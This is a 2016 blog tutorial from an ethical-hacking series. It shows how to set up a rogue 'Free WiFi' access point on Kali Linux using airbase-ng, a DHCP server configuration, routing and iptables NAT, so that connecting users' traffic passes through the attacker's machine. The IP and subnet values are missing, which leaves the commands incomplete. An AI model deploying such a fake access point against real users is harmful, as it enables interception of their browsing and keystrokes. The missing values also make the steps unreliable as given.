Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points

April 7, 2016 | Views: 27492

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points

Got free WiFi in the airport? At college? In motels? Or anywhere else?… Before connecting, we must make sure the access points are really broadcasted by
companies/offices/colleges themselves. Maybe the AP is fake (and not really associated with airport/college/motels). Someone might have created a fake AP, so they can track our browsing history, and capture our key strokes (for a MITM and a lot more). BEWARE ! ! ! This all is about ROGUE Wireless Access Points.


Tools required:

apt-get: to get new dhcp software


airbase-ng: turns our kali to AP

dhcpd3: for adding dhcp server functionality.


The fake AP process goes like this:

1) Someone connects to fake AP, that we created
2) With DHCP, we provide dynamically changing IP address to them.
3) Similarly, we provide a default gateway, DNS.


Let’s begin….


apt-get update

apt-get upgrade

Let it finish, then run:

apt-get install dhcp3-server -y

(-y is simply yes for any prompts)

(Now, for safety. . .we move the default dhcp conf file to backup, so that we can access it next time if needed)


mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

(in case of wrong location above, search in Google for the location)

We’re with an empty conf file. We must assign new things here, such as gateway, DNS…for the purpose of hand out to the user who connects to this fake AP.


Let’s assume we did as follows in our logical interface:

Network :


Gateway :

These will create our specified wireless routing network.

Let’s assume our n/w is at


When user connects to the fake AP and wants to surf internet, he goes first from the specified content and then gets routed to original destination via our n/w at:


Let’s work in work in our text editor. You can choose your best one. I’ll use nano:


nano /etc/dhcp3/dhcpd.conf

You’ll get blank text editor of dhcpd.conf.

Now, write following exactly:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers;



airmon-ng start wlan0

airodump-ng mon0


Let’s create new ESSID “Free WiFi”:


airbase-ng –essid “Free Wifi” -c 6 mon0

(The Channel is 6, as seen after airodump-ng mon0, but it may differ on your case.)

Open new tab, or clone the session. Run:

ifconfig at0 up

Next, lets assign the IP to at0. Run:

ifconfig at0


Let’s route the Kali machine with our assigned GW. Run:

route add-net netmask gw

Start DHCP server service. Run:

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/ at0

/etc/init.d/dhcp3-server start


iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface eth0 -j
iptables –append FORWARD –in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward


Finally, wait and watch in the previous tab to see if someone’s associated with Free WiFi or not. Enjoy!

A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.

See the other posts in this series:

Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux – Part 2: Finding Hidden SSIDS
Ethical Hacking with Kali Linux – Part 3: Bypassing Mac Address Filter
Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)

By : Bijay Acharya 
Follow me :

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. This tutorial needs to be updated to facilitate Kali Rolling. The command apt-get install dhcp3-server -y is obsolete. Currently the package is not in the repository. Furthermore apt-get is also obsolete. I believe its best practice to be teaching correct methodology. Simply: apt install isc-dhcp-server

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?